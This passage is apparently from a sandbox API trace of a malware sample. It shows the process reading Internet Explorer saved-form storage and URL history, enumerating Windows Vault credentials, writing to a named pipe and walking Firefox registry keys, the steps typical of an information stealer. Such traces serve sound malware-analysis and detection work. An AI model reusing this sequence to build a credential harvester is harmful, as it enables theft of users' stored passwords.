(in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="94") returned 2 [0249.454] lstrlenW (lpString="") returned 0 [0249.454] lstrlenW (lpString="94") returned 2 [0249.454] LocalAlloc (uFlags=0x40, uBytes=0x86) returned 0xd1b32f0 [0249.454] lstrcpyW (in: lpString1=0xd1b32f0, lpString2="" | out: lpString1="") returned="" [0249.454] lstrcatW (in: lpString1="", lpString2="94" | out: lpString1="94") returned="94" [0249.454] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="E8") returned 2 [0249.454] lstrlenW (lpString="94") returned 2 [0249.454] lstrlenW (lpString="E8") returned 2 [0249.454] LocalAlloc (uFlags=0x40, uBytes=0x8a) returned 0x5d322d0 [0249.454] lstrcpyW (in: lpString1=0x5d322d0, lpString2="94" | out: lpString1="94") returned="94" [0249.454] lstrcatW (in: lpString1="94", lpString2="E8" | out: lpString1="94E8") returned="94E8" [0249.454] LocalFree (hMem=0xd1b32f0) returned 0x0 [0249.454] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="DC") returned 2 [0249.454] lstrlenW (lpString="94E8") returned 4 [0249.455] lstrlenW (lpString="DC") returned 2 [0249.455] LocalAlloc (uFlags=0x40, uBytes=0x8e) returned 0x5d33db0 [0249.455] lstrcpyW (in: lpString1=0x5d33db0, lpString2="94E8" | out: lpString1="94E8") returned="94E8" [0249.455] lstrcatW (in: lpString1="94E8", lpString2="DC" | out: lpString1="94E8DC") returned="94E8DC" [0249.455] LocalFree (hMem=0x5d322d0) returned 0x0 [0249.455] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="BF") returned 2 [0249.455] lstrlenW (lpString="94E8DC") returned 6 [0249.455] lstrlenW (lpString="BF") returned 2 [0249.455] LocalAlloc (uFlags=0x40, uBytes=0x92) returned 0x5d34170 [0249.455] lstrcpyW (in: lpString1=0x5d34170, lpString2="94E8DC" | out: lpString1="94E8DC") returned="94E8DC" [0249.455] lstrcatW (in: lpString1="94E8DC", lpString2="BF" | out: lpString1="94E8DCBF") returned="94E8DCBF" [0249.455] LocalFree (hMem=0x5d33db0) returned 0x0 [0249.455] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="88") returned 2 [0249.455] lstrlenW (lpString="94E8DCBF") returned 8 [0249.455] lstrlenW (lpString="88") returned 2 [0249.455] LocalAlloc (uFlags=0x40, uBytes=0x96) returned 0x5d33db0 [0249.455] lstrcpyW (in: lpString1=0x5d33db0, lpString2="94E8DCBF" | out: lpString1="94E8DCBF") returned="94E8DCBF" [0249.455] lstrcatW (in: lpString1="94E8DCBF", lpString2="88" | out: lpString1="94E8DCBF88") returned="94E8DCBF88" [0249.455] LocalFree (hMem=0x5d34170) returned 0x0 [0249.455] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="81") returned 2 [0249.455] lstrlenW (lpString="94E8DCBF88") returned 10 [0249.455] lstrlenW (lpString="81") returned 2 [0249.455] LocalAlloc (uFlags=0x40, uBytes=0x9a) returned 0xd1d0910 [0249.455] lstrcpyW (in: lpString1=0xd1d0910, lpString2="94E8DCBF88" | out: lpString1="94E8DCBF88") returned="94E8DCBF88" [0249.455] lstrcatW (in: lpString1="94E8DCBF88", lpString2="81" | out: lpString1="94E8DCBF8881") returned="94E8DCBF8881" [0249.455] LocalFree (hMem=0x5d33db0) returned 0x0 [0249.455] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="23") returned 2 [0249.455] lstrlenW (lpString="94E8DCBF8881") returned 12 [0249.455] lstrlenW (lpString="23") returned 2 [0249.455] LocalAlloc (uFlags=0x40, uBytes=0x9e) returned 0xd1cfcb0 [0249.455] lstrcpyW (in: lpString1=0xd1cfcb0, lpString2="94E8DCBF8881" | out: lpString1="94E8DCBF8881") returned="94E8DCBF8881" [0249.455] lstrcatW (in: lpString1="94E8DCBF8881", lpString2="23" | out: lpString1="94E8DCBF888123") returned="94E8DCBF888123" [0249.455] LocalFree (hMem=0xd1d0910) returned 0x0 [0249.455] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="EB") returned 2 [0249.455] lstrlenW (lpString="94E8DCBF888123") returned 14 [0249.455] lstrlenW (lpString="EB") returned 2 [0249.455] LocalAlloc (uFlags=0x40, uBytes=0xa2) returned 0xd1d05a0 [0249.455] lstrcpyW (in: lpString1=0xd1d05a0, lpString2="94E8DCBF888123" | out: lpString1="94E8DCBF888123") returned="94E8DCBF888123" [0249.455] lstrcatW (in: lpString1="94E8DCBF888123", lpString2="EB" | out: lpString1="94E8DCBF888123EB") returned="94E8DCBF888123EB" [0249.455] LocalFree (hMem=0xd1cfcb0) returned 0x0 [0249.455] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="C4") returned 2 [0249.455] lstrlenW (lpString="94E8DCBF888123EB") returned 16 [0249.455] lstrlenW (lpString="C4") returned 2 [0249.455] LocalAlloc (uFlags=0x40, uBytes=0xa6) returned 0xd1cfcb0 [0249.455] lstrcpyW (in: lpString1=0xd1cfcb0, lpString2="94E8DCBF888123EB" | out: lpString1="94E8DCBF888123EB") returned="94E8DCBF888123EB" [0249.455] lstrcatW (in: lpString1="94E8DCBF888123EB", lpString2="C4" | out: lpString1="94E8DCBF888123EBC4") returned="94E8DCBF888123EBC4" [0249.456] LocalFree (hMem=0xd1d05a0) returned 0x0 [0249.456] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="C1") returned 2 [0249.456] lstrlenW (lpString="94E8DCBF888123EBC4") returned 18 [0249.456] lstrlenW (lpString="C1") returned 2 [0249.456] LocalAlloc (uFlags=0x40, uBytes=0xaa) returned 0xd217030 [0249.456] lstrcpyW (in: lpString1=0xd217030, lpString2="94E8DCBF888123EBC4" | out: lpString1="94E8DCBF888123EBC4") returned="94E8DCBF888123EBC4" [0249.456] lstrcatW (in: lpString1="94E8DCBF888123EBC4", lpString2="C1" | out: lpString1="94E8DCBF888123EBC4C1") returned="94E8DCBF888123EBC4C1" [0249.456] LocalFree (hMem=0xd1cfcb0) returned 0x0 [0249.456] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="80") returned 2 [0249.456] lstrlenW (lpString="94E8DCBF888123EBC4C1") returned 20 [0249.456] lstrlenW (lpString="80") returned 2 [0249.456] LocalAlloc (uFlags=0x40, uBytes=0xae) returned 0xd217c30 [0249.456] lstrcpyW (in: lpString1=0xd217c30, lpString2="94E8DCBF888123EBC4C1" | out: lpString1="94E8DCBF888123EBC4C1") returned="94E8DCBF888123EBC4C1" [0249.456] lstrcatW (in: lpString1="94E8DCBF888123EBC4C1", lpString2="80" | out: lpString1="94E8DCBF888123EBC4C180") returned="94E8DCBF888123EBC4C180" [0249.456] LocalFree (hMem=0xd217030) returned 0x0 [0249.456] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="6D") returned 2 [0249.456] lstrlenW (lpString="94E8DCBF888123EBC4C180") returned 22 [0249.456] lstrlenW (lpString="6D") returned 2 [0249.456] LocalAlloc (uFlags=0x40, uBytes=0xb2) returned 0xd2167f0 [0249.456] lstrcpyW (in: lpString1=0xd2167f0, lpString2="94E8DCBF888123EBC4C180" | out: lpString1="94E8DCBF888123EBC4C180") returned="94E8DCBF888123EBC4C180" [0249.456] lstrcatW (in: lpString1="94E8DCBF888123EBC4C180", lpString2="6D" | out: lpString1="94E8DCBF888123EBC4C1806D") returned="94E8DCBF888123EBC4C1806D" [0249.456] LocalFree (hMem=0xd217c30) returned 0x0 [0249.456] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="AC") returned 2 [0249.456] lstrlenW (lpString="94E8DCBF888123EBC4C1806D") returned 24 [0249.456] lstrlenW (lpString="AC") returned 2 [0249.456] LocalAlloc (uFlags=0x40, uBytes=0xb6) returned 0xd217030 [0249.456] lstrcpyW (in: lpString1=0xd217030, lpString2="94E8DCBF888123EBC4C1806D" | out: lpString1="94E8DCBF888123EBC4C1806D") returned="94E8DCBF888123EBC4C1806D" [0249.456] lstrcatW (in: lpString1="94E8DCBF888123EBC4C1806D", lpString2="AC" | out: lpString1="94E8DCBF888123EBC4C1806DAC") returned="94E8DCBF888123EBC4C1806DAC" [0249.456] LocalFree (hMem=0xd2167f0) returned 0x0 [0249.456] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="44") returned 2 [0249.456] lstrlenW (lpString="94E8DCBF888123EBC4C1806DAC") returned 26 [0249.456] lstrlenW (lpString="44") returned 2 [0249.456] LocalAlloc (uFlags=0x40, uBytes=0xba) returned 0xd215290 [0249.456] lstrcpyW (in: lpString1=0xd215290, lpString2="94E8DCBF888123EBC4C1806DAC" | out: lpString1="94E8DCBF888123EBC4C1806DAC") returned="94E8DCBF888123EBC4C1806DAC" [0249.456] lstrcatW (in: lpString1="94E8DCBF888123EBC4C1806DAC", lpString2="44" | out: lpString1="94E8DCBF888123EBC4C1806DAC44") returned="94E8DCBF888123EBC4C1806DAC44" [0249.456] LocalFree (hMem=0xd217030) returned 0x0 [0249.456] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="7C") returned 2 [0249.456] lstrlenW (lpString="94E8DCBF888123EBC4C1806DAC44") returned 28 [0249.456] lstrlenW (lpString="7C") returned 2 [0249.456] LocalAlloc (uFlags=0x40, uBytes=0xbe) returned 0xd2151c0 [0249.456] lstrcpyW (in: lpString1=0xd2151c0, lpString2="94E8DCBF888123EBC4C1806DAC44" | out: lpString1="94E8DCBF888123EBC4C1806DAC44") returned="94E8DCBF888123EBC4C1806DAC44" [0249.456] lstrcatW (in: lpString1="94E8DCBF888123EBC4C1806DAC44", lpString2="7C" | out: lpString1="94E8DCBF888123EBC4C1806DAC447C") returned="94E8DCBF888123EBC4C1806DAC447C" [0249.456] LocalFree (hMem=0xd215290) returned 0x0 [0249.456] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="8A") returned 2 [0249.456] lstrlenW (lpString="94E8DCBF888123EBC4C1806DAC447C") returned 30 [0249.457] lstrlenW (lpString="8A") returned 2 [0249.457] LocalAlloc (uFlags=0x40, uBytes=0xc2) returned 0xd214b40 [0249.457] lstrcpyW (in: lpString1=0xd214b40, lpString2="94E8DCBF888123EBC4C1806DAC447C" | out: lpString1="94E8DCBF888123EBC4C1806DAC447C") returned="94E8DCBF888123EBC4C1806DAC447C" [0249.457] lstrcatW (in: lpString1="94E8DCBF888123EBC4C1806DAC447C", lpString2="8A" | out: lpString1="94E8DCBF888123EBC4C1806DAC447C8A") returned="94E8DCBF888123EBC4C1806DAC447C8A" [0249.457] LocalFree (hMem=0xd2151c0) returned 0x0 [0249.457] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="96") returned 2 [0249.457] lstrlenW (lpString="94E8DCBF888123EBC4C1806DAC447C8A") returned 32 [0249.457] lstrlenW (lpString="96") returned 2 [0249.457] LocalAlloc (uFlags=0x40, uBytes=0xc6) returned 0xd2150f0 [0249.457] lstrcpyW (in: lpString1=0xd2150f0, lpString2="94E8DCBF888123EBC4C1806DAC447C8A" | out: lpString1="94E8DCBF888123EBC4C1806DAC447C8A") returned="94E8DCBF888123EBC4C1806DAC447C8A" [0249.457] lstrcatW (in: lpString1="94E8DCBF888123EBC4C1806DAC447C8A", lpString2="96" | out: lpString1="94E8DCBF888123EBC4C1806DAC447C8A96") returned="94E8DCBF888123EBC4C1806DAC447C8A96" [0249.457] LocalFree (hMem=0xd214b40) returned 0x0 [0249.457] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="7B") returned 2 [0249.457] lstrlenW (lpString="94E8DCBF888123EBC4C1806DAC447C8A96") returned 34 [0249.457] lstrlenW (lpString="7B") returned 2 [0249.457] LocalAlloc (uFlags=0x40, uBytes=0xca) returned 0x5d66960 [0249.457] lstrcpyW (in: lpString1=0x5d66960, lpString2="94E8DCBF888123EBC4C1806DAC447C8A96" | out: lpString1="94E8DCBF888123EBC4C1806DAC447C8A96") returned="94E8DCBF888123EBC4C1806DAC447C8A96" [0249.457] lstrcatW (in: lpString1="94E8DCBF888123EBC4C1806DAC447C8A96", lpString2="7B" | out: lpString1="94E8DCBF888123EBC4C1806DAC447C8A967B") returned="94E8DCBF888123EBC4C1806DAC447C8A967B" [0249.457] LocalFree (hMem=0xd2150f0) returned 0x0 [0249.457] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="50") returned 2 [0249.457] lstrlenW (lpString="94E8DCBF888123EBC4C1806DAC447C8A967B") returned 36 [0249.457] lstrlenW (lpString="50") returned 2 [0249.457] LocalAlloc (uFlags=0x40, uBytes=0xce) returned 0x5d67e60 [0249.457] lstrcpyW (in: lpString1=0x5d67e60, lpString2="94E8DCBF888123EBC4C1806DAC447C8A967B" | out: lpString1="94E8DCBF888123EBC4C1806DAC447C8A967B") returned="94E8DCBF888123EBC4C1806DAC447C8A967B" [0249.457] lstrcatW (in: lpString1="94E8DCBF888123EBC4C1806DAC447C8A967B", lpString2="50" | out: lpString1="94E8DCBF888123EBC4C1806DAC447C8A967B50") returned="94E8DCBF888123EBC4C1806DAC447C8A967B50" [0249.457] LocalFree (hMem=0x5d66960) returned 0x0 [0249.457] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="42") returned 2 [0249.457] lstrlenW (lpString="94E8DCBF888123EBC4C1806DAC447C8A967B50") returned 38 [0249.457] lstrlenW (lpString="42") returned 2 [0249.457] LocalAlloc (uFlags=0x40, uBytes=0xd2) returned 0x5d667a0 [0249.457] lstrcpyW (in: lpString1=0x5d667a0, lpString2="94E8DCBF888123EBC4C1806DAC447C8A967B50" | out: lpString1="94E8DCBF888123EBC4C1806DAC447C8A967B50") returned="94E8DCBF888123EBC4C1806DAC447C8A967B50" [0249.457] lstrcatW (in: lpString1="94E8DCBF888123EBC4C1806DAC447C8A967B50", lpString2="42" | out: lpString1="94E8DCBF888123EBC4C1806DAC447C8A967B5042") returned="94E8DCBF888123EBC4C1806DAC447C8A967B5042" [0249.457] LocalFree (hMem=0x5d67e60) returned 0x0 [0249.457] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="39") returned 2 [0249.457] lstrlenW (lpString="94E8DCBF888123EBC4C1806DAC447C8A967B5042") returned 40 [0249.457] lstrlenW (lpString="39") returned 2 [0249.457] LocalAlloc (uFlags=0x40, uBytes=0xd6) returned 0x5d67e60 [0249.457] lstrcpyW (in: lpString1=0x5d67e60, lpString2="94E8DCBF888123EBC4C1806DAC447C8A967B5042" | out: lpString1="94E8DCBF888123EBC4C1806DAC447C8A967B5042") returned="94E8DCBF888123EBC4C1806DAC447C8A967B5042" [0249.457] lstrcatW (in: lpString1="94E8DCBF888123EBC4C1806DAC447C8A967B5042", lpString2="39" | out: lpString1="94E8DCBF888123EBC4C1806DAC447C8A967B504239") returned="94E8DCBF888123EBC4C1806DAC447C8A967B504239" [0249.458] LocalFree (hMem=0x5d667a0) returned 0x0 [0249.458] CryptDestroyHash (hHash=0x5d9d6e0) returned 1 [0249.458] CryptReleaseContext (hProv=0x5d3a110, dwFlags=0x0) returned 1 [0249.458] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c4f360 | out: phkResult=0x1c4f360*=0x0) returned 0x2 [0249.458] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20219, phkResult=0x1c4f300 | out: phkResult=0x1c4f300*=0x0) returned 0x2 [0249.458] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20119, phkResult=0x1c4f2a0 | out: phkResult=0x1c4f2a0*=0x0) returned 0x2 [0249.458] LocalFree (hMem=0x5d67e60) returned 0x0 [0249.458] RegEnumValueW (in: hKey=0x94c, dwIndex=0x17, lpValueName=0x1c4f510, lpcchValueName=0x1c4f768, lpReserved=0x0, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760 | out: lpValueName="url1", lpcchValueName=0x1c4f768, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760) returned 0x103 [0249.458] RegCloseKey (hKey=0x94c) returned 0x0 [0249.458] LocalFree (hMem=0x43ed4e0) returned 0x0 [0249.459] GetProcAddress (hModule=0x7ff977b60000, lpProcName="CoCreateInstance") returned 0x7ff9778b7000 [0249.459] CoCreateInstance (in: rclsid=0x74c9640*(Data1=0x3c374a40, Data2=0xbae4, Data3=0x11cf, Data4=([0]=0xbf, [1]=0x7d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x69, [6]=0x46, [7]=0xee)), pUnkOuter=0x0, dwClsContext=0x15, riid=0x74c9660*(Data1=0xafa0dc11, Data2=0xc313, Data3=0x11d0, Data4=([0]=0x83, [1]=0x1a, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd5, [6]=0xae, [7]=0x38)), ppv=0x1c4f770 | out: ppv=0x1c4f770*=0x5c10630) returned 0x0 [0249.459] RegGetValueW (in: hkey=0x94e, lpSubKey="TreatAs", lpValue=0x0, dwFlags=0xffff, pdwType=0x0, pvData=0x1c4ed80, pcbData=0x1c4ecc8*=0xc8 | out: pdwType=0x0, pvData=0x1c4ed80, pcbData=0x1c4ecc8*=0xc8) returned 0x2 [0249.459] RegGetValueW (in: hkey=0x94e, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x1c4ebd0, pvData=0x0, pcbData=0x1c4ec28*=0x0 | out: pdwType=0x1c4ebd0*=0x1, pvData=0x0, pcbData=0x1c4ec28*=0x3e) returned 0x0 [0249.459] RegGetValueW (in: hkey=0x94e, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x1c4ebd0, pvData=0xd1bde80, pcbData=0x1c4ec28*=0x3e | out: pdwType=0x1c4ebd0*=0x1, pvData="Microsoft Url History Service", pcbData=0x1c4ec28*=0x3c) returned 0x0 [0249.459] StrCmpIW (psz1="InprocServer32", psz2="DelegateExecute") returned 1 [0249.459] RegGetValueW (in: hkey=0x936, lpSubKey=0x0, lpValue="InprocServer32", dwFlags=0x23, pdwType=0x1c4eb20, pvData=0x0, pcbData=0x1c4eb78*=0x0 | out: pdwType=0x1c4eb20*=0x0, pvData=0x0, pcbData=0x1c4eb78*=0x0) returned 0x2 [0249.459] RegGetValueW (in: hkey=0x936, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x1c4eb60, pvData=0x0, pcbData=0x1c4ebb8*=0x0 | out: pdwType=0x1c4eb60*=0x1, pvData=0x0, pcbData=0x1c4ebb8*=0x42) returned 0x0 [0249.460] RegGetValueW (in: hkey=0x936, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x1c4eb60, pvData=0xd1be6f0, pcbData=0x1c4ebb8*=0x42 | out: pdwType=0x1c4eb60*=0x1, pvData="C:\\Windows\\System32\\ieframe.dll", pcbData=0x1c4ebb8*=0x40) returned 0x0 [0249.460] StrCmpIW (psz1="ThreadingModel", psz2="DelegateExecute") returned 1 [0249.460] RegGetValueW (in: hkey=0x936, lpSubKey=0x0, lpValue="ThreadingModel", dwFlags=0x20000003, pdwType=0x1c4eb10, pvData=0x1c4eb30, pcbData=0x1c4eaf8*=0x3c | out: pdwType=0x1c4eb10*=0x1, pvData="Apartment", pcbData=0x1c4eaf8*=0x14) returned 0x0 [0249.460] RegGetValueW (in: hkey=0x94e, lpSubKey="InprocHandler32", lpValue=0x0, dwFlags=0x23, pdwType=0x1c4eb80, pvData=0x0, pcbData=0x1c4ebd8*=0x0 | out: pdwType=0x1c4eb80*=0x0, pvData=0x0, pcbData=0x1c4ebd8*=0x0) returned 0x2 [0249.460] RegGetValueW (in: hkey=0x94e, lpSubKey="InprocHandler", lpValue=0x0, dwFlags=0x23, pdwType=0x1c4eb80, pvData=0x0, pcbData=0x1c4ebd8*=0x0 | out: pdwType=0x1c4eb80*=0x0, pvData=0x0, pcbData=0x1c4ebd8*=0x0) returned 0x2 [0251.304] IUrlHistoryStg:EnumUrls (in: This=0x5c10630, ppenum=0x1c4f768 | out: ppenum=0x1c4f768*=0x5cface0) returned 0x0 [0251.684] IUnknown:Release (This=0x5c10630) returned 0x1 [0251.684] LocalFree (hMem=0x3761a0) returned 0x0 [0251.684] GetVersionExW (in: lpVersionInformation=0x1c4f320*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c4f320*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x2800, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0251.684] LoadLibraryW (lpLibFileName="vaultcli.dll") returned 0x7ff968360000 [0251.685] GetProcAddress (hModule=0x7ff968360000, lpProcName="VaultOpenVault") returned 0x7ff968362310 [0251.686] GetProcAddress (hModule=0x7ff968360000, lpProcName="VaultCloseVault") returned 0x7ff9683623a0 [0251.686] GetProcAddress (hModule=0x7ff968360000, lpProcName="VaultEnumerateItems") returned 0x7ff9683621c0 [0251.686] GetProcAddress (hModule=0x7ff968360000, lpProcName="VaultGetItem") returned 0x7ff968361ff0 [0251.687] GetProcAddress (hModule=0x7ff968360000, lpProcName="VaultGetItem") returned 0x7ff968361ff0 [0251.687] GetProcAddress (hModule=0x7ff968360000, lpProcName="VaultFree") returned 0x7ff96836e340 [0251.688] VaultOpenVault () returned 0x0 [0251.970] VaultEnumerateItems () returned 0x0 [0251.970] VaultFree () returned 0x1 [0251.970] VaultCloseVault () returned 0x0 [0251.971] FreeLibrary (hLibModule=0x7ff968360000) returned 1 [0251.971] IStream:RemoteSeek (in: This=0xd1ee010, dlibMove=0x0, dwOrigin=0x1, plibNewPosition=0x1c4f760 | out: plibNewPosition=0x1c4f760) returned 0x0 [0251.971] IStream:RemoteSeek (in: This=0xd1ee010, dlibMove=0x60, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0251.971] IStream:SetSize (This=0xd1ee010, libNewSize=0x60) returned 0x0 [0251.971] IStream:RemoteSeek (in: This=0xd1ee010, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0251.971] IStream:Stat (in: This=0xd1ee010, pstatstg=0x1c4f7d0, grfStatFlag=0x1 | out: pstatstg=0x1c4f7d0) returned 0x0 [0251.971] ISequentialStream:RemoteRead (in: This=0xd1ee010, pv=0x79b3470, cb=0x60, pcbRead=0x1c4f878 | out: pv=0x79b3470*=0x23, pcbRead=0x1c4f878*=0x60) returned 0x0 [0251.972] CallNamedPipeA (in: lpNamedPipeName="\\\\.\\pipe\\{072BB6F5-BAEC-D114-FC2B-8E95F08FA299}", lpInBuffer=0x7aaecd0, nInBufferSize=0x6c, lpOutBuffer=0x1c4f720, nOutBufferSize=0xc, lpBytesRead=0x1c4f770, nTimeOut=0x1 | out: lpOutBuffer=0x1c4f720, lpBytesRead=0x1c4f770) returned 1 [0251.996] StrStrIW (lpFirst="Software\\Mozilla", lpSrch="Thunderbird") returned 0x0 [0251.996] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0xd212550 [0251.996] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Mozilla", ulOptions=0x0, samDesired=0x20219, phkResult=0x1c4f778 | out: phkResult=0x1c4f778*=0xb48) returned 0x0 [0251.997] GetProcAddress (hModule=0x7ff976f80000, lpProcName="RegEnumKeyExW") returned 0x7ff976f97180 [0251.997] RegEnumKeyExW (in: hKey=0xb48, dwIndex=0x0, lpName=0xd212550, lpcchName=0x1c4f768, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Firefox", lpcchName=0x1c4f768, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0251.997] lstrlenW (lpString="Software\\Mozilla") returned 16 [0251.997] lstrlenW (lpString="\\") returned 1 [0251.997] LocalAlloc (uFlags=0x40, uBytes=0xa4) returned 0xd1cfe10 [0251.997] lstrcpyW (in: lpString1=0xd1cfe10, lpString2="Software\\Mozilla" | out: lpString1="Software\\Mozilla") returned="Software\\Mozilla" [0251.997] lstrcatW (in: lpString1="Software\\Mozilla", lpString2="\\" | out: lpString1="Software\\Mozilla\\") returned="Software\\Mozilla\\" [0251.998] lstrlenW (lpString="Software\\Mozilla\\") returned 17 [0251.998] lstrlenW (lpString="Firefox") returned 7 [0251.998] LocalAlloc (uFlags=0x40, uBytes=0xb2) returned 0xd2180b0 [0251.998] lstrcpyW (in: lpString1=0xd2180b0, lpString2="Software\\Mozilla\\" | out: lpString1="Software\\Mozilla\\") returned="Software\\Mozilla\\" [0251.998] lstrcatW (in: lpString1="Software\\Mozilla\\", lpString2="Firefox" | out: lpString1="Software\\Mozilla\\Firefox") returned="Software\\Mozilla\\Firefox" [0251.998] LocalFree (hMem=0xd1cfe10) returned 0x0 [0251.998] StrStrIW (lpFirst="Software\\Mozilla\\Firefox", lpSrch="Thunderbird") returned 0x0 [0251.998] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0xd19b080 [0251.998] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Mozilla\\Firefox", ulOptions=0x0, samDesired=0x20219, phkResult=0x1c4f718 | out: phkResult=0x1c4f718*=0x944) returned 0x0 [0251.998] RegEnumKeyExW (in: hKey=0x944, dwIndex=0x0, lpName=0xd19b080, lpcchName=0x1c4f708, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TaskBarIDs", lpcchName=0x1c4f708, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0251.998] lstrlenW (lpString="Software\\Mozilla\\Firefox") returned 24 [0251.998] lstrlenW (lpString="\\") returned 1 [0251.998] LocalAlloc (uFlags=0x40, uBytes=0xb4) returned 0xd217c30 [0251.998] lstrcpyW (in: lpString1=0xd217c30, lpString2="Software\\Mozilla\\Firefox" | out: lpString1="Software\\Mozilla\\Firefox") returned="Software\\Mozilla\\Firefox" [0251.998] lstrcatW (in: lpString1="Software\\Mozilla\\Firefox", lpString2="\\" | out: lpString1="Software\\Mozilla\\Firefox\\") returned="Software\\Mozilla\\Firefox\\" [0251.998] lstrlenW (lpString="Software\\Mozilla\\Firefox\\") returned 25 [0251.998] lstrlenW (lpString="TaskBarIDs") returned 10 [0251.998] LocalAlloc (uFlags=0x40, uBytes=0xc8) returned 0xd2156a0 [0251.998] lstrcpyW (in: lpString1=0xd2156a0, lpString2="Software\\Mozilla\\Firefox\\" | out: lpString1="Software\\Mozilla\\Firefox\\") returned="Software\\Mozilla\\Firefox\\" [0251.998] lstrcatW (in: lpString1="Software\\Mozilla\\Firefox\\", lpString2="TaskBarIDs" | out: lpString1="Software\\Mozilla\\Firefox\\TaskBarIDs") returned="Software\\Mozilla\\Firefox\\TaskBarIDs" [0251.998] LocalFree (hMem=0xd217c30) returned 0x0 [0251.998] StrStrIW (lpFirst="Software\\Mozilla\\Firefox\\TaskBarIDs", lpSrch="Thunderbird") returned 0x0 [0251.998] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0xd19c110 [0251.998] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Mozilla\\Firefox\\TaskBarIDs", ulOptions=0x0, samDesired=0x20219, phkResult=0x1c4f6b8 | out: phkResult=0x1c4f6b8*=0x9f8) returned 0x0 [0251.998] RegEnumKeyExW (in: hKey=0x9f8, dwIndex=0x0, lpName=0xd19c110, lpcchName=0x1c4f6a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x1c4f6a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0251.998] RegCloseKey (hKey=0x9f8) returned 0x0 [0251.998] LocalFree 